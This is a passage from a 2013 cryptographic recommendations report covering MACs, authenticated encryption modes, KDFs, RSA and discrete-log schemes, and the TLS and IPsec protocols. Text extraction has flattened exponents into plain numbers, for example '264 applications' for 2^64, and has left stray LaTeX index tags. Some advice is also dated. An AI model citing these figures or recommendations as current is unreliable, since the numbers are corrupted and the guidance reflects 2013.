body of work examining weaknesses of the construction, e.g. [143,289,303]. Due to these potential
issues use of GMAC outside of GCM mode is we leave in the legacy only division. See the entry
on GCM mode below for further commentary.
4.2.3 Hash Function Based MACs
HMAC
The HMAC scheme1was introduced in [29] and standardized in [172, 207]. The construction is
based on an underlying hash function which, itself, needs to have an iterative design. Provable
security results for HMAC aim to establish that HMAC is a PRF [28,29]. Interestingly, this can be
done only relying on the pseudorandomness of the underlying hash-function and does not require
collision-resistance [28]. In particular, this means that instantiations of HMAC with hash-functions
that are not collision-resistant may still be reasonably secure, provided that the collision attacks
do not yield distinguishing attacks against the psuedorandomness of the underlying hash function.
HMAC-MD4 should therefore not be used while HMAC-SHA1, HMAC-MD5 are still choices for
which forgeries cannot be made. Conservative instantiations should consider HMAC-SHA2 and
HMAC-SHA3.
UMAC
UMAC was introduced in [49] and specified in [209]. The scheme has provable security guaran-
tees [49]. The scheme uses internally a universal-hash function for which the computation can be
paralellized which in turn allows for efficient implementations with high throughput. The scheme
requires a nonce for each application; one should ensure that the input nonces do not repeat.
Rekeying should occur after 264applications. Due to analysis by Hanschuh and Preneel [143], the
32-bit output version resilts in a full key recovery after a few chosen texts and 240verifications.
This implies one also needs to limit the number of verifications, irrespective of nonce reuse.
4.3 Authenticated Encryption
An authenticated encryption (AE) scheme aims to provide a stronger form of confidentiality than
that achieved by the IND-CPA modes of operation considered earlier. In particular an AE scheme
1The standard ISO 9797-2 specifies three closely related schemes that can be seen as instantiations of NMAC with
different parameters
Page: 43
Algorithms, Key Size and Parameters Report – 2013 Recommendations
provides both confidentiality (IND-CPA) and ciphertext integrity (INT-CTXT), both of which to-
gether imply security for Authenticated Encryption (a stronger notion than standard IND-CCA).
An authenticated encryption scheme which is for one-time use only is often called a Data Encap-
sulation Mechanism (DEM) . .
4.3.1 Encrypt-then-MAC (and variants)
Encrypt-then-MAC is probably the simplest mechanism to construct an authenticated encryption
scheme. The security of the method was studied in [32], where the benefits over other techniques are
discussed. The main disadvantage when using Encrypt-then-MAC is that it is a two pass process.
Usage of Encrypt-then-MAC with CBC mode as the encryption scheme (with zero-IV) and
CBC-MAC as the message authentication code is a common DEM for use with public key KEMs to
produce public key encryption schemes. Use of zero-IV in non DEM (i.e. non one-time applications)
is not recommended, due to the basic requirement of probabilistic encryption in most applications.
Other related techniques, such as Encrypt-and-MAC or MAC-then-Encrypt, in general should
notbe used as various real world attacks have been implemented on systems which use these insecure
variants; for example SSL/TLS uses MAC-then-Encrypt and in such a configuration suffers from an
attack [13]. Methods such as MAC-then-Encrypt can be shown to be secure in specific environments
and with specific components (i.e. specific underlying IND-CPA encryption scheme and specific
underlying MAC), however the probability of an error being made in the choice, implementation
or application are too large to allow recommendation.
4.3.2 OCB
Offset Codebook (OCB) mode [168] was proposed by Rogaway et al. [299]. The mode’s design is
based on Jutla’s authenticated encryption mode, IAPM. OCB mode is provably secure assuming
the underlying block cipher is secure. OCB mode is a one-pass mode of operation making it highly
efficient. Only one block cipher call is necessary for each plaintext block, (with an additional two
calls needed to complete the whole encryption process).
The adoption of OCB mode has been hindered due to two U.S. patents. As of January 2013,
the author has stated that OCB mode is free for software usage under an GNU General Public
License, and for other non-open-source software under a non-military license [298].
4.3.3 CCM
CCM mode [259] was proposed in [342] and essentially combines CTR mode with CBC-MAC, using
the same block cipher and key. The mode is defined only for 128-bit block ciphers and is used in
802.11i. A proof of security was given in [179], and a critique has been given in [300].
The main drawback of CCM mode comes from its inefficiency. It is a two-pass method, meaning
that each plaintext block implies two block cipher calls. Secondly, the mode is not “online”, as a
result the whole plaintext must be known before encryption can be performed. An online scheme
Page: 44
Algorithms, Key Size and Parameters Report – 2013 Recommendations
allows encryption to be perform on-the-fly as and when plaintext blocks are available. For this
reason (amongst others) CCM mode has in some sense been superseded by EAX mode.
4.3.4 EAX
EAX mode [168] was presented in [36], where an associated proof of security was also given. It is
very similar to CCM mode, also being a two-pass method based on CTR mode and CBC-MAC but
with the advantage that both encryption and decryption can be performed in an online manner.
4.3.5 CWC
Carter-Wegman + Counter (CWC) mode was designed by Kohno, Viega and Whiting [205]. As
the name suggests it combines a Carter-Wegman MAC, to achieve authenticity, with CTR mode
encryption, to achieve privacy. It is provably secure assuming the IV is a nonce and the underlying
block cipher is secure. When considering whether to standardise CWC mode or GCM, NIST
ultimately chose GCM. As a result GCM is much more widely used and studied.
4.3.6 GCM
Galois/Counter Mode (GCM) [260] was designed by McGrew and Viega [236, 237] as an improve-
ment to CWC mode. It again combines Counter mode with a Carter-Wegman MAC (i.e. GMAC),
whose underlying hash function is based on polynomials over the finite field GF(2128). GCM is
widely used and is recommended as an option in the IETF RFCs for IPsec, SSH and TLS. The
mode is online, is fully parallelisable and its design facilitates efficient implementations in hardware.
GCM is provably secure [174] assuming that the IV is a nonce and the underlying block cipher
is secure. Note that repeating IVs lead to key recovery attacks [143]. Joux [181] demonstrated
a problem in the NIST specification of GCM when non-default length IVs are used. Ferguson’s
[180] critique highlights a security weakness when short authentication tags are used. To prevent
attacks based on short tags it is recommended that authentication tags have length at least 96 bits.
Furthermore it is recommended that the length of nonces is fixed at 96 bits. Saarinen [303] raises
the issues of weak keys which may lead to cycling attacks. For messages which are not “too large”
such attacks are not a concern. The work of [289] presents an algebraic analysis which demonstrates
even more weak keys.
4.4 Key Derivation Functions
Key Derivation Functions (KDFs) are used to derive cryptographic keys from secret shared random
strings. For example they are used to derive keys for use in authenticated encryption schemes from
a secret shared random string which is determined via a public key encapsulation. In security
proofs they are often modelled as random oracles; but simply instantiating them with a vanilla
Page: 45
Algorithms, Key Size and Parameters Report – 2013 Recommendations
hash function is not to be recommended (despite this being common practice in academic papers).
Thus specific KDFs are designed for use in various situations. Often they take additional input
of a shared info field, which is not necessarily secret. We summarize the constructions in Table
4.3, where the column “Building Block” refers to the underlying primitive used to create the KDF
primitive.
4.4.1 NIST-800-108-KDF
NIST-SP800-108 [257] defines a family of KDFs based on psuedo-random-functions PRFs. These
KDFs can produce arbitrary length output and they are formed by repeated application of the
PRF. One variant (Counter mode) applies the PRF with the input secret string as key, to an input
consisting of a counter and auxiliary data; one variant (Feedback mode) does the same but also
takes as input in each round the output of the previous round. The final double pipelined mode
uses two iterations of the same PRF (with the same key in each iteration), but the output of the
first iteration (working in a feedback mode) is passed as input into the second iteration; with the
second iteration forming the output. The standard does not define how any key material is turned
into a key for the PRF, but this is addressed in NIST-SP800-56C [264].
4.4.2 X9.63-KDF
This KDF is defined in the ANSI standard X9.63 [20] and was specifically designed in that standard
for use with elliptic curve derived keys; although this is not important for its application. The
KDF works by repeatedly hashing the concatenation of the shared random string, a counter and
the shared info. The KDF is secure in the random oracle model.
4.4.3 NIST-800-56-KDFs
A variant of the X9.63-KDF is defined in NIST-SP800-56A/B, [262, 263]. The main distinction
being the hash function is repeatedly applied to the concatenation of the counter, the shared
random string and the shared info (i.e. a different order is used).
In NIST-SP800-56C [264] a different KDF is defined which uses a MAC function application
to obtain the derived key; with a publicly known parameter (or salt value) used as the key to the
MAC. This KDF has stronger security guarantees than the hash function based KDFs (for example
one does not need a proof in the random oracle model). However, the output length is limited to
the output length of the MAC, which can be problematic when deriving secret keys for use in
authenticated encryption schemes requiring double length keys (e.g. Encrypt-then-MAC). For this
reason the standard also specifies a key expansion methodology based on NIST-800-108 [257], which
takes the same MAC function used in the KDF, and then uses the output of the KDF as the key
to the MAC function so as to define a PRF.
Page: 46
Algorithms, Key Size and Parameters Report – 2013 Recommendations
4.4.4 IKE-v1-KDF and IKE-v2-KDF
This is the KDF specified in [144] and [191] for use with Diffie–Hellman agreed keys (and others)
derived in the IKE sub-protocol of IPsec. The methods use a HMAC as a PRF. In both variants
HMAC is first used to extract randomness from the shared random value (i.e. a Diffie–Hellman
secret), and then HMAC is used again to derive the actual key material. The IETF considers the
Version 1 of the KDF to be obsolete.
4.4.5 TLS-KDF
This is the KDF defined for use in TLS, it is defined in [93] and [50]. In the TLS v1.0 and v1.1
versions of the KDF, HMAC-SHA1 and HMAC-MD5 are used as KDFs and their outputs are then
exclusive-or’d together; producing a PRF sometimes called HMAC-MD5/HMAC-SHA1 . In TLS
v1.2 the PRF is simply HMAC instantiated with SHA-2. In both cases the underlying PRF is used
to both extract randomness and for key expansion.
4.5 Generalities on Public Key Schemes
Before using a public key scheme there are some basic operations which need to be performed. We
recap on these here as an aid memoir for the reader, but do not discuss them in much extra detail.
•Certification: Public keys almost always need to be certified in some way; i.e. a crypto-
graphic binding needs to be established between the public key and the identity of the user
claiming to own that key. Such certification usually comes in the form of a digital certificate,
produced using a recommended signing algorithm. This is not needed for the identity based
schemes considered later.
•Domain Parameter Validation: Some schemes, such as those based on discrete logarithms,
share a set of a parameters across a number of users; these are often called Domain Parameters.
Before using such a set of domain parameters a user needs to validate them to be secure, i.e.
to meet the security level that the user is expecting. To ease this concern it is common to
select domain parameters which have been specified in a well respected standards document.
•Public Key Validation: In many schemes and protocols long term or ephemeral public
keys need to be validated. By this we mean that the data being received actually corresponds
to a potentially valid public key (and not a potentially weak key). For example this could
consist of checking whether a received elliptic curve point actually is a point on the given
curve, or does not lie in a small subgroup. These checks are very important for security but
often are skipped in descriptions of protocols and academic treatments.
Page: 47
Algorithms, Key Size and Parameters Report – 2013 Recommendations
4.6 Public Key Encryption
Public key encryption schemes are rarely used to actually encrypt messages, they are usually used
to encrypt a symmetric key for future bulk encryption. Of the schemes considered below only RSA-
PKCS# 1 v1.5 and RSA-OAEP can be considered as traditional public key encryption algorithms.
Non-KEM based applications should only be used when encrypting small amounts of data, and in
this case only RSA-OAEP is secure.
4.6.1 RSA-PKCS# 1 v1.5
This encryption method defined in [281,282] has no modern security proof, although it is used in the
SSL/TLS protocol extensively. A chosen ciphertext reaction attack [52] can be applied, although
the operation of the encryption scheme within SSL/TLS has been modified to mitigate against this
specific attack. The weak form of padding can also be exploited in other attacks if related messages
and/or a low public exponent are used [80,83,146]. This method of encryption is not recommended
for any applications, bar the specific use (for legacy reasons) in SSL/TLS.
4.6.2 RSA-OAEP
Defined in [282], and first presented in [35], this is the preferred method of using the RSA primitive
to encrypt a small message. It is known to be provably secure in the random oracle model [130].
A decryption failure oracle attack is possible [227] if implementations are not careful in uniform
error reporting/constant timing. Security is proved in the random oracle model, i.e. under the
assumption that the hash functions used in the scheme behave as random oracles. It is recommended
that the hash functions used in the scheme be implemented with SHA-1 for legacy applications and
SHA-2/SHA-3 for future applications.
4.7 Hybrid Encryption
The combination of a Key Encapsulation Mechanism (KEM) with a Data Encryption Mechanism
(DEM) (both secure in the sense of IND-CCA) results in a secure (i.e. IND-CCA) public key
encryption algorithm; and is referred to as a hybrid cipher. This is the preferred method for
performing public key encryption of data, and is often called the KEM-DEM paradigm.
Various standards specify the precise DEM to be used with a specific KEM. So for example
ECIES can refer to a standardized scheme in which a specific choice of DEM is mandated for use
with ECIES-KEM. In this document we allow anyDEM to be used with anyKEM, the exact choice
is left to the user. The precise analysis depends on the security level (legacy or future) we assign
to the DEM and the constituent parts; as well as the precise instantiation of the underlying public
key primitive.
Page: 48
Algorithms, Key Size and Parameters Report – 2013 Recommendations
4.7.1 RSA-KEM
Defined in [166], this Key Encapsulation Method takes a random element m∈Z/NZand encrypts
it using the RSA function. The resulting ciphertext is the encapsulation of a key. The output key is
given by applying a KDF to m, so as to obtain a key in {0,1}k. The scheme is secure in the random
oracle model (modeling the KDF as a random oracle), with very good security guarantees [147,319].
It is recommended that the KDF used in the scheme be one of the recommendations from Section
4.4.
4.7.2 PSEC-KEM
This scheme is defined in [166]. Again when modeling the KDF as a random oracle, this scheme
is provable secure, assuming the computational Diffie–Hellman problem is hard in the group under
which the scheme is instantiated. Whilst this gives a stronger security guarantee than ECIES-KEM
below, in that security is not based on gap Diffie–Hellman, the latter scheme is often preferred due
to performance considerations. Again it is recommended that the KDF used in the scheme be one
of the recommendations from Section 4.4.
4.7.3 ECIES-KEM
This is the discrete logarithm based encryption scheme of choice. Defined in [20, 166, 314], the
scheme is secure assuming the KDF is modelled as a random oracle. However, this guarantee is
requires one to assume the gap Diffie–Hellman is hard (which holds in general elliptic curve groups
but sometimes not in pairing groups). Earlier versions of standards defining ECIES had issues
related to how the KDF was applied, producing a form of benign malleability , which although not a
practical security weakness did provide unwelcome features of the scheme. Again it is recommended
that the KDF used in the scheme be one of the recommendations from Section 4.4.
4.8 Public Key Signatures
4.8.1 RSA-PKCS# 1 v1.5
Defined in [281, 282] this scheme has no security proof, nor any advantages over other RSA based
schemes such as RSA-PSS below, however it is widely deployed. As such we do not recommend use
beyond legacy systems.
4.8.2 RSA-PSS
This scheme, defined in [282], can be shown to be UF-CMA secure in the random oracle model [178].
It is used in a number of places including e-passports.
Page: 49
Algorithms, Key Size and Parameters Report – 2013 Recommendations
4.8.3 RSA-FDH
The RSA-FDH scheme hashes the message to the group Z/NZand then applies the RSA (decryp-
tion) function to the output. The scheme has strong provable security guarantees [81,82,187], but is
not recommended for use in practice due to the difficulty of defining a suitably strong hash function
with codomain the group Z/NZ. Thus whilst conceptually simple and appealing the scheme is not
practically deployable.
One way to instantiate the hash function for an l(N) bit modulus would be to use a hash
function with an output length of more than 2 ·l(N) bits, and then take the output of this hash
function modulo Nso as to obtain the pre-signature. This means the full domain of the RSA
function will be utilized with very little statistical bias in the distribution obtained. This should
be compared with ISO’s DS3 below.
4.8.4 ISO 9796-2 RSA Based Mechanisms
ISO 9796-2 [170] defined three different RSA signature padding schemes called Digital Signature 1,
Digital Signature 2 and Digital Signature 3. Each scheme supports either full or partial message
recovery (depending of course on the length of the message). We shall refer to these as DS1, DS2
and DS3.
Variant DS1 essentially RSA encrypts a padded version of the message along with a hash of
the message. This variant has been attacked by Coron et al [84, 85] which reduced breaking the
padding scheme from 280operations to 261operations. Using a number of implementation tricks
the authors of [85] manage to produce forgeries in a matter of days utilizing a small number of
machines. Thus this variant should no longer be considered secure.
Variant DS2 is a standardized version of RSA-PSS, but in a variant which allows partial message
recovery. All comments associated to RSA-PSS apply to variant DS2.
Variant DS3 is defined by taking DS2 and reducing the randomization parameter to length zero.
This results in a deterministic signatures scheme which is “very close” to RSA-FDH, but for which
the full RSA domain is not used to produce signatures. The fact that a hash image is not taken
into the full group Z/NZmeans the security proof for RSA-FDH does not apply. We therefore do
not recommend the use of DS3 for future applications.
4.8.5 (EC)DSA
The Digital Signature Algorithm (DSA) and its elliptic curve variant (ECDSA) is widely standard-
ized [19,314]; and there exists a number of variants including the German DSA (GDSA) [151,164],
the Korean DSA (KDSA) [164,331] and the Russian DSA (RDSA) [136,165]. The basic construct
is to produce an ephemeral public key (the first part of the signature component), then hash the
message to an element in Z/qZ, and finally to combine the hashed message, the static secret and
the long term secret in a “signing equation” to produce the second part of the signature.
Page: 50
Algorithms, Key Size and Parameters Report – 2013 Recommendations
All (EC)DSA variants have weak provable security guarantees; whilst some proofs do exist they
are in less well understood models (such as the generic group), for example [63]. The reason for this
is that the hash function is only applied to the message and not the combination of the message
and the ephemeral public key.
All (EC)DSA variants also suffer from lattice attacks against poor ephemeral secret generation
[155, 255, 256]. A method to prevent this, proposed in [294] but known to be “folklore”, is derive
the ephemeral secret key by applying a PRF (with a default key) to a message containing the static
secret key and the message to be signed.
4.8.6 PV Signatures
ISO 14888-3 [164] defined a variant of DSA signatures (exactly the same signing equation as for
DSA), but with the hash function computed on the message and the ephemeral key. This scheme
is due to Pointcheval and Vaudeney [284]. The signatures can be shown to be provably secure in
the random oracle model, and so have much of the benefits of Schnorr signatures. However Schnorr
signatures have a simpler to implement signing equation (no need for any modular inversions).
Whilst only defined in the finite field setting in ISO 14888-3, the signatures can trivially be extended
to the elliptic curve situation.
Just like (EC)DSA signatures, PV signatures suffer from issues related to poor randomness
in the ephemeral secret key. Thus the defenses proposed for (EC)DSA signatures should also be
applied to PV signatures.
4.8.7 (EC)Schnorr
Schnorr signatures [313], standardized in [165], are like (EC)DSA signatures with two key differ-
ences; firstly the signing equation is simpler (allowing for some optimizations) and secondly the hash
function is applied to the concatenation of the message and the ephemeral key. This last property
means that Schnorr signatures can be proved UF-CMA secure in the random oracle model [283].
There is also a proof in the generic group model [254]. We believe Schnorr signatures are to be
preferred over DSA style signatures for future applications.
Just like (EC)DSA signatures, Schnorr signatures suffer from issues related to poor randomness
in the ephemeral secret key. Thus the defenses proposed for (EC)DSA signatures should also be
applied to Schnorr signatures.
4.9 Identity Based Encryption/KEMs
4.9.1 BF
The Boneh–Franklin IBE scheme [58,59] is known to be fully (ID-IND-CCA) secure in the random
oracle model and is presented in the IEEE 1363.3 standard [160]. The scheme is not as efficient as
Page: 51
Algorithms, Key Size and Parameters Report – 2013 Recommendations
the following two schemes, and it does not scale well with increased security parameters; thus it is
only recommended for legacy use. The underlying construction can also be used in a KEM mode.
4.9.2 BB
The Boneh–Boyen IBE scheme [56] is secure in the standard model under the decision Bilinear
Diffie–Hellman assumption, but only in a weak model of selective ID security. However, the scheme,
as presented in the IEEE 1363.3 standard [160], hashes the identities before executing the main BB
scheme. The resulting scheme is therefore fully secure in the random oracle model. The scheme
is efficient, including at high security levels, and has a number of (technical) advantages when
compared to other schemes.
4.9.3 SK
The Sakai–Kasahara key construction is known to be fully secure in the random oracle model,
and at the same curve/field size outperforms the prior two schemes. The constructions comes as
an encryption scheme [73] and a KEM construction [74], and is also defined in the IEEE 1363.3
standard [160]. The main concern on using this scheme is due to the underlying hard problem (the
q-bilinear Diffie–Hellman inversion problem) not being as hard as the underlying hard problem of
the other schemes. This concern arises from a series of results, initiating with those of Cheon [75],
onq-style assumptions.
Page: 52
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Chapter 5
Protocols
Our choice of protocols to cover is mainly dictated by what we feel is of most interest to the reader.
However, there has been much less analysis of protocols, such as those in this chapter, compared to
the primitives and schemes presented in previous chapters. Thus much of what we discuss in this
chapter can be seen as more likely to change as the research community shifts its focus to analyzing
protocols over the coming decade. The reader will hopefully also see by our analysis that most of
the deployed protocols which can be used by a naive user, are in fact either incredibly complex to
install in a manner which we would deam secure, or are in fact insecure with respect to modern
cryptographic standards.
We divide our discussion on protocols into general protocols for which there is some choice
as to using them and application specific protocols for which there is no choice as to usage. For
example application developers often choose to use TLS as a means to securing a channel between
applications, and the various parameters can then be selected by the developer. On the other
hand one is forced to use UMTS/LTE if one wishes to use a standard mobile phone, with provider
mandated parameters and algorithms. In addition the use of UMTS/LTE outside this application
is very limited. Clearly this division is not complete, as in some sense one is also forced to use TLS
when accessing secure web sites, but the usage of TLS is much wider than that.
5.1 General Protocols
5.1.1 Key Agreement
We first discuss key agreement, since this is the one areas in which there has been a rigourous
analysis of protocols; with concrete security definitions being given. Despite this the situation in
relation to how these security definitions map onto real world protocols and their usages is still in
a state of flux.
The NIST standard [262] (resp. [263]) and the ANSI standards [17,20] (resp. [18]) define methods
for general key agreement using discrete logarithm based systems (resp. factoring based systems).
Page: 53
Algorithms, Key Size and Parameters Report – 2013 Recommendations
The standard [262] introduces a nice taxonomy for such schemes with the notation C(a, b), where
a, b∈{0,1,2}. The number arefers to how many of the two parties contribute ephemeral keys
to the calculation and the number brefers to how many of the two parties are authenticated by
long term public/private key pairs. For example, traditional non-authenticated Diffie–Hellman is
denoted as a C(2,0) scheme, where as traditional MQV [212] is denoted as a C(2,2) scheme. The
standards also provide various mechanisms for key confirmation.
The security of key agreement schemes is somewhat complicated. The traditional security
models of Bellare, Rogaway, et al base security on indistinguishablity of keys [33, 34, 51, 68]. This
property is often not satisfied by real world protocols, and in particular by protocols using key
confirmation. This issue has started to be treated in a number of works focusing on the TLS
protocol (see below). Also discussion of the notion of one-sided authentication in key agreement
has only recently started in the academic literature [65, 208]. Thus many of the options in these
standards cannot be said to have fully elaborated proofs of security which are applicable in general
situations.
The precise choice of which key agreement scheme to use is therefore highly dictated by the
underlying application. However, the current document can be used to determine key sizes (for
the underlying factoring and discrete logarithm based primitives) as well as the key derivation
functions, MAC functions and any other basic cryptographic components used.
5.1.2 TLS
The TLS protocol is primarily aimed at securing traffic between an unauthenticated web browser
and an authenticated web site, although the protocol is now often used in other applications due
in part to the availability (and ease of use) of a variety of libraries implementing TLS. The TLS
protocol suite aims to provide a confidential channel rather than simply a key agreement protocol
as discussed before. The key agreement phase has now been fairly thoroughly analyzed in a variety
of works [64,175,176,208,247]. A major issue in these analyses is the use of the derived key during
key confirmation via the FINISHED messages. Care must be taken in long term key generation
as a number of TLS implementations have been shown to be weak due to poor random number
generation [148].
The key agreement phase runs in one of two main modes: either RSA-based key transport or
Diffie–Hellman key exchange (an option also exists for pre-shared keys). The RSA key transport
methodology uses RSA-PKCS#1 v1.5, which as discussed previously in Section 4.6.1 is not con-
sidered secure in a modern sense. However, the use of this key transport methodology has been
specifically patched in TLS to avoid the attack described in [52], and a formal security analysis
supporting this approach in the TLS context can be found in [208]. In both modes the output of
the key agreement phase is a so-called pre-master secret.
During the key agreement phase the key to use in the transport layer is derived from the agreed
pre-master secret. This derivation occurs in one of two ways, depending on whether TLS 1.2 [95]
is used or whether an earlier standard is used (TLS 1.0 [94] and TLS 1.1 [94]). As discussed
Page: 54
Algorithms, Key Size and Parameters Report – 2013 Recommendations
in Section 4.4.5, the use of TLS-v1.1-KDF should only be used for legacy applications, with the
TLS-v1.2-KDF variant being considered suitable for future applications.
The record layer, i.e. the layer in which actual encrypted messages are sent and received, has
received extensive analysis. In TLS 1.0 and TLS 1.1 the two choices are either MAC-then-Encode-
then-Encrypt using a block cipher in CBC mode or the use of MAC-then-Encrypt using the RC4
stream cipher. Both these forms of the record layer have been shown to be problematic [12, 13,
71, 273, 335]. The main problems here are that the MAC-then-Encode-then-Encrypt construction
used in TLS is difficult to implement securely (and hard to provide positive security results about),
and that RC4 is, by modern standards, a weak stream cipher. These issues are partially corrected
in TLS 1.2 [95] by adding support for Authenticated Encryption, and with GCM mode and CCM
mode for TLS being specified in [305] and [234], respectively. Other recent attacks include those by
Duong and Rizzo, known as BEAST [99] and CRIME [100]. BEAST exploits the use of chained IVs
in CBC mode in TLS 1.0, and CRIME takes advantage of information leakage from the optional
use of data compression in TLS.
Given the above discussion it is hard to recommend that TLS 1.0 and TLS 1.1 be used in
any new application, and phasing out their use in legacy applications is recommended. It would
appear that TLS 1.2 is sufficient for future applications. However, there are currently very few
implementations of clients, servers, or libraries which support TLS 1.2.
A complete list of ciphersuites for TLS is listed at the website http://www.iana.org/assignments/
tls-parameters/tls-parameters.xml . If following the recommendations of this document, the
restrictions on the ciphersuites to conform to our future recommendations means this relatively
large list becomes relatively small. Looking at the record layer protocol (i.e. the algorithms to
encrypt the actual data), we see that only the use of Camellia and AES are recommended within
a mode such as GCM or CCM.
For the handshake, key agreement, part of the protocol the principle issue is that the RSA
signing algorithm in TLS 1.2 is RSA-PKCS# 1 v1.5. As explained in Section 4.8.1 we do not
recommend the use of this signature scheme in future systems. The RSA key transport mechanism
is itself based on RSA-PKCS# 1 v1.5, which we again pointed out in Section 4.6.1 has no formal
proof of security, and which cannot be recommended beyond its use in legacy systems. However,
a recent analysis [208] does show that RSA-PKCS# 1 v1.5 for key transport in TLS can be made
secure under a sufficiently strong number theoretic assumption and in the Random Oracle Model.
Considering the discrete logarithm or elliptic curve variants, one finds that the situation is little
better. The required signature algorithm here is (EC)DSA, which also has no proof of security, bar
in the generic group model for the elliptic curve variant. See Section 4.8.5 for more details. Thus
for the key negotiation phase one is left to rely on cryptographic schemes which we only recommend
for legacy use.
This means at the time of writing we would only recommend the following cipher suites, for
future use within TLS
•⋆_WITH_Camellia\index{Camellia}_128_GCM_SHA256 ,
Page: 55
Algorithms, Key Size and Parameters Report – 2013 Recommendations
•⋆_WITH_AES_128_GCM_SHA256 ,
•⋆_WITH_Camellia\index{Camellia}_256_GCM_SHA384 ,
•⋆_WITH_AES_256_GCM_SHA384 ,
•⋆_WITH_AES_128_CCM ,
•⋆_WITH_AES_128_CCM_8 ,
•⋆_WITH_AES_256_CCM ,
•⋆_WITH_AES_256_CCM_8 .
where ⋆is suffix denoting the underlying key exchange primitive.
5.1.3 IPsec
IPsec is designed to provide security at the IP network layer of the TCP/IP protocol stack. This
differs from protocols such as TLS and SSH which provide security at higher layers such as the
application layer. This is advantageous since no re-engineering of the applications is required
to benefit from the security IPsec provides. The main use of IPsec has been to create virtual
private networks (VPNs) which facilitates secure communication over an untrusted network such
as the Internet. The protocol was originally standardised in a collection of RFCs in 1995 and their
third incarnation can be found in RFCs 4301–4309 [103, 152, 154, 191, 194–197, 311]. For a more
complete description of the cryptography in the IPsec standards we refer the reader to the survey
by Paterson [271].
The IPsec protocols can be deployed in two basic modes: tunnel and transport. In tunnel mode
cryptographic protection is provided for entire IP packets. In essence, a whole packet (plus security
fields) is treated as the new payload of an outer IP packet, with its own header, called the outer
header. The original, or inner, IP packet is said to be encapsulated within the outer IP packet. In
tunnel mode, IPsec processing is typically performed at security gateways (e.g. perimeter firewalls
or routers) on behalf of endpoint hosts. By contrast, in transport mode, the header of the original
packet itself is preserved, some security fields are inserted, and the payload together with some
header fields undergo cryptographic processing. Transport mode is typically used when end-to-
end security services are needed, and provides protection mostly for the packet payload. In either
mode, one can think of the IPsec implementation as intercepting normal IP packets and performing
processing on them before passing them on (to the network interface layer in the case of outbound
processing, or to the upper layers in the case of inbound processing).
Each IPsec implementation contains a Security Policy Database (SPD), each entry of which
defines processing rules for certain types of traffic. Each entry in the SPD points to one or more
Security Associations (SAs) (or the need to establish new SAs). The SAs contain (amongst other
information) cryptographic keys, initialisation vectors and anti-replay counters, all of which must
Page: 56
Algorithms, Key Size and Parameters Report – 2013 Recommendations
be initialised and shared between appropriate parties securely. This can be solved manually, and
such an approach works well for small-scale deployments for testing purposes. However, for larger
scale and more robust use of IPsec, an automated method is needed. The Internet Key Exchange
(IKE) Protocol provides the preferred method for SA negotiation and associated cryptographic
parameter establishment. The latest version of IKE, named IKEv2 [192], provides a flexible set
of methods for authentication and establishment of keys and other parameters, supporting both
asymmetric and symmetric cryptographic methods. There were initially two Diffie–Hellman Groups
defined for use in IKEv2 [192, Appendix B], one with a 768-bit modulus the other with 1024-bit
modulus. Further DH groups are defined in RFC3526 [200] of sizes 1536, 2048, 3072, 4096, 6144
and 8192 bits. Elliptic Curve groups are defined in RFC 5903 [129] with sizes of 256, 384 and 521
bits. RFC5114 [218] defines an additional 8 groups. Based on Section 3.5 we recommend for future
use a group size of at least 3072 bits, and 256 bits in the case of elliptic curve groups. For key
derivation, as discussed in Section 4.4.4, the use of IKE-v1-KDF should only be used for legacy
applications, with the IKE-v2-KDF variant being considered suitable for future applications.
There are two main IPsec protocols which specify the actual cryptographic processing applied to
packets. These are called Authentication Header (AH) and Encapsulating Security Payload (ESP).
AH provides integrity protection, data origin authentication and anti-replay services for packets
through the application of MAC algorithms and the inclusion of sequence numbers in packets.
There are a number of MAC algorithms defined for use with IPsec. These include HMAC (with
MD5 [224], SHA-1 [225] or SHA-2 [193]), GMAC [235] and XCBC (a CBC-MAC variant) [127].
Based on earlier chapters we only recommend HMAC with SHA-2 for future use.
ESP provides similar services to AH (though the coverage of its optional integrity protection
feature is more limited) and in addition provides confidentiality and traffic flow confidentiality
services through symmetric key encryption and variable length padding of packets. ESP allows both
encryption-only and authenticated encryption modes. The attacks we shall mention in the following
paragraph demonstrate the encryption-only modes should notbe used. ESP must therefore always
be configured with some form of integrity protection. The encryption algorithms on offer are CBC
mode (with either 3DES [278], AES [126] or Camellia [190]), CTR mode (with either AES [153] or
Camellia [190]). Of these algorithms we would only recommend CTR mode and stress it must be
combined with a MAC algorithm. Further options for authentication encryption are provided by
the combined algorithms CCM (with either AES [154] or Camellia [190])and GCM with AES [154].
An initial analysis of the IPsec standards was performed by Ferguson and Schneier [121]. This
was followed by Bellovin [38] who found a number of attacks against encryption-only ESP. Practical
attacks were demonstrated by Paterson and Yau [277] against the Linux implementation of IPsec
where encryption-only ESP was operating in tunnel mode. By adapting the padding oracle attack
of Vaudenay [335], Degabriele and Paterson were then able to break standards-compliant imple-
mentations of IPsec [91] with practical complexities. These attacks were against encryption-only
ESP using CBC mode and operating in either tunnel or transport mode. From these attacks, the
need to use some form of integrity protection in IPsec is evident. It is therefore recommended
that encryption-only ESP notbe used. A further set of attacks by Degabriele and Paterson [92]
Page: 57
Algorithms, Key Size and Parameters Report – 2013 Recommendations
breaks IPsec when it is implemented in any MAC-then-Encrypt configuration (for example, if AH
in transport mode is used prior to encryption-only ESP in tunnel mode). On the other hand, no
attacks are known if ESP is followed by AH, or if ESP’s innate integrity protection feature is used.
To conclude, we reiterate that ESP should always be used with some form of integrity protection,
and that care is needed to ensure an appropriate form of integrity protection is provided.
A close to complete list of ciphersuites for IPsec is listed at the website http://www.iana.
org/assignments/isakmp-registry/isakmp-registry.xml . Based on the information in this
document we would only recommend the following algorithms for future use within IPsec:
If only authentication is required then either AH or ESP may be used with one of the following
MAC algorithms as defined in RFC4868 [193].
•HMAC-SHA2-256 ,
•HMAC-SHA2-384 ,
•HMAC-SHA2-512 ,
If confidentiality is required then ESP should be used by combining one of the following en-
cryption algorithms with one of the MAC algorithms described above.
•AES-CTR ,
•CAMELLIA-CTR ,
Alternatively one of the following combined authenticated encryption modes may be used:
•AES-CCM_ ⋆,
•CAMELLIA-CCM_ ⋆,
•AES-GCM_ ⋆,
Here ⋆denotes the size (in bytes) of the integrity check value (ICV) and we recommend choosing
either 12 or 16.
5.1.4 SSH
Secure Shell (SSH) was originally design as a replacement for insecure remote shell protocols such
as telnet. It has now become a more general purpose tool that is used to provide a secure channel
between two networked computers for applications such as secure file transfer. SSHv2 was stan-
dardised in a collection of RFCs [347–349] in 2006. The originally version, SSHv1 has several design
flaws and should no longer be used. OpenSSH [1] is the most widely used implementation of the
protocol. As of 2008 it accounted for more than 80% of all implementations. The transport layer
Page: 58
